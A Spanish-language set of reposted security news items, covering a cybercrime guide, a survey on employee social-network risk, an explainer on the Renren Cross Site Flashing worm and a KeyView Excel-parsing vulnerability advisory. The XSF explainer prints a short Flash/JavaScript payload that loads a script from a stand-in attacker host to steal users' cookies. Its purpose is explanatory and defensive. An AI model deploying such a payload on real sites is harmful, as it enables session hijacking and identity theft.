Los ciberataques son una nueva forma de delincuencia online. Gracias al desarrollo de las nuevas tecnologías y a la gran penetración de las mismas en los hogares, han evolucionado y adquirido niveles de peligrosidad inauditos. Los delincuentes han encontrado un auténtico filón en esta modalidad ya que todos los usuarios de Internet somos víctimas potenciales.

El objetivo de esta guía es proporcionar unas pautas básicas para protegerse de los ciberdelincuentes y facilitar al lector una “enciclopedia básica” sobre las última modalidades de riesgo online.

Fuente: Kaspersky

www.segu-info.com.ar

Read more:
Guía para frenar el Cibercrimen |

El 63% de las empresas se muestran preocupadas por la posibilidad de que sus trabajadores revelen demasiada información en las redes sociales de internet y que esto las ponga en peligro, según una encuesta realizada por la compañía de seguridad informática Sophos.

Las redes sociales ya forman parte de los hábitos diarios de muchos trabajadores, que acceden a ellas para establecer relaciones con otras personas, ver fotos o actualizar sus perfiles.

Este uso frecuente sitúa a sitios como Twitter, Facebook, MySpace o LinkedIn en el punto de mira de “cibercriminales” que utilizan estas plataformas para acceder a identidades de los usuarios, difundir programas dañinos o enviar anuncios publicitarios, según dice Sophos en una nota.

El estudio indica que una cuarta parte de las compañías encuestadas ha sido víctimas durante este año de ataques de “spam, phishing o malware”, que comprometen la seguridad del ordenador o consiguen robar información personal, lo que convierte el acceso a estas redes en unas de las principales preocupaciones para estas empresas.

Twitter ha sido objeto de numerosos ataques cibernéticos, como el envío masivo de “spam” por parte de un usuario que consiguió colapsar el servidor, o la presencia de numerosos anuncios de contenido provocativo que acaban conectando al internauta otras páginas de contenido para adultos.

“Mientras las estafas continúen encontrando un público, los defraudadores seguirán explotando las redes sociales para robar información y difundir más ataques; sin embargo, la prohibición del acceso a estas redes en el lugar de trabajo puede ser una estrategia que cause más daño que bien”, ha subrayado Sophos.

Considera que la prohibición del acceso no impediría que estos usuarios dejaran de utilizar las redes sociales, sino que les animaría a buscar nuevas vías, algo que acabaría abriendo “agujeros en la seguridad corporativa”.

Por ello, esta compañía de seguridad aconseja no actuar contra las redes sociales, sino que anima a encontrar una fórmula para sacarles el máximo provecho, como por ejemplo contactar con clientes actuales y potenciales.

Educar a los trabajadores sobre el peligroso impacto que conlleva el acceso a determinadas páginas de internet, realizar un filtrado de acceso de algunos sitios de redes sociales, comprobar la información que su organización y el personal comparten en la red o revisar con regularidad la configuración de seguridad de la empresa son otras de las recomendaciones que sugiere Sophos.

Fuente: Cinco Dias

www.segu-info.com.ar

Here is the original:
Empresas preocupadas por lo que dicen sus empleados |

Supongo que nuestros lectores habrán oido hablar del gusano que afectó a la red social Twitter allá por el mes de abril. De hecho, Laura publicó un artículo sobre la contratación del creador del mismo aquí. El ataque consistía en que gracias a una vulnerabilidad del tipo XSS (Cross-Site Scripting) permitía suplantar la identidad de un montón de usuarios atacados y twittear desde su cuenta.

En este caso, el objetivo de los ataques ha sido la red social china Renren. Para ello se ha utilizado una variante de ataque XSS encapsulado mediante archivos Flash. Como resultado, este ataque se ha llamado XSF o Cross Site Flashing.

¿Cómo se llevó a cabo el ataque?
La red social Renren permite, al igual que otras como Facebook o Tuenti, permite compartir contenido multimedia. Para ello se puede hacer mediante videos o en formato Flash. Para este último, el enlace a un fichero SWF, se hace mediante una función llamada playswf() que crea una porción de código así:

<embed src=”"+o.filename+”” type=”application/x-shockwave-flash”
“+”width=”"+(o.width||”320?)+”” height=”"+(o.height||”240?)+”” allowFullScreen=”true”
wmode=”"+(o.wmode||”transparent”)+”” allowScriptAccess=”always” ></embed>

Atención especial merece el parámetro allowScriptAccess. Gracias a él se limita el nivel de acceso que el objeto “embebido” tendrá sobre el resto de la página HTML. Si se asigna “allowScriptAccess=sameDomain” el objeto flash, sólo tendrá acceso a la página HTML si se llama desde el mismo dominio, haciendo falta que el atacante subiera el fichero a ejecutar al mismo dominio, utilizando alguna otra técnica.
Sin embargo, en condiciones en las que el parámetro allowScriptAccess tenga el valor “always”, el objeto flash tiene acceso a cualquier parte de la sesión HTML, como por ejemplo, las cookies. 1, 2, 3,… responda otra vez: Las Cookies.

A partir de aquí el resto del ataque consiste en crear un objeto flash en el que se pueda incluir en el fichero Flash una porción de código que ejecute un Javascript malicioso que envíe las cookies de los usuarios que vean ese “inocente” flash a una localización remota. A partir de ahí el atacante contará con acceso a la identidad de un montón de usuarios.

Por ejemplo,

var fun = 'var x=document.createElement("SCRIPT");x.src="http://www.delatacante.com/malicioso.js"; x.defer=true;document.getElementsByTagName("HEAD")[0].appendChild(x);';
flash.external.ExternalInterface.call('eval', fun);

Asimismo, el usuario final verá el flash sin saber que ha ejecutado código Javascript malicioso robando su cookie.

El ataque a la red social Renren, además consistía en aprovechar las credenciales del individuo para enviar el video a todos sus contactos.

Como podéis ver, XSS encapsulado en un objeto Flash embebido en una página web… gracias a excesivos permisos para ese objeto. Recomendación, si tenéis algún tipo de sitio web que permita compartir este tipo ficheros, forzad el parámetro “allowScriptAccess” a “samedomain”.

Fuente: Security by Default y Sophos

www.segu-info.com.ar

View post:
XSF: Cross Site Flashing. Ataque web encapsulado en Flash |

Se ha anunciado una vulnerabilidad de desbordamiento de búfer en una librería empleada por diversos programas para la visualización de archivos en formato Excel por la que un usuario remoto podría provocar la ejecución de código arbitrario en los sistemas afectados. El problema se ha confirmado que afecta a IBM Lotus Notes (versiones 6.5, 7.0, 8.0 y 8.5) y en múltiples productos Symantec.

El problema reside en el Autonomy KeyView SDK un SDK comercial que proporciona múltiples librerías para el tratamiento de archivos en diferentes formatos, entre los que se incluye el formato Microsoft Excel 97 (XLS). Son muchos los productos que hacen uso de esta librería, entre los programas confirmados como afectados se encuentran IBM Lotus Notes y múltiples productos Symantec, aunque la lista puede ser más extensa.

Un atacante remoto podría crear un archivo malicioso con formato de hoja de calculo Microsoft Excel para posteriormente enviarlo como adjunto. En el caso de Lotus Notes se requiere que el usuario abra el adjunto lo que provocaría un desbordamiento de búfer con posibilidad de ejecución de código arbitrario. Sin embargo en otros casos, el proceso puede realizarse de forma automática por la aplicación cuando examina el documento. Las circunstancias específicas dependen de la aplicación atacada.

Los privilegios que el atacante conseguirá también dependerán de la aplicación que hace uso de la librería. En Lotus Notes el código se ejecutará con los privilegios del usuario atacado, mientras que en Symantec Mail Security permite obtener privilegios del sistema.

• IBM ha publicado un parche que corrige este problema en Lotus Notes, disponible mediante una petición de servicio en el soporte de IBM.
• >Symantec también ha publicado un parche que corrige esta problema. Dada la diversidad de productos y versiones afectadas se recomienda consultar el aviso de Symantec:
• Autonomy KeyView Excel File SST Parsing Integer Overflow Vulnerability
• Potential security issue with Lotus Notes file viewer for Microsoft Excel
• Security Advisories Relating to Symantec Products – Symantec Products Autonomy KeyView Module Vulnerability

Antonio Ropero

Fuente: Hispasec

www.segu-info.com.ar

Excerpt from:
Vulnerabilidad al visualizar archivos Excel desde diferentes programas |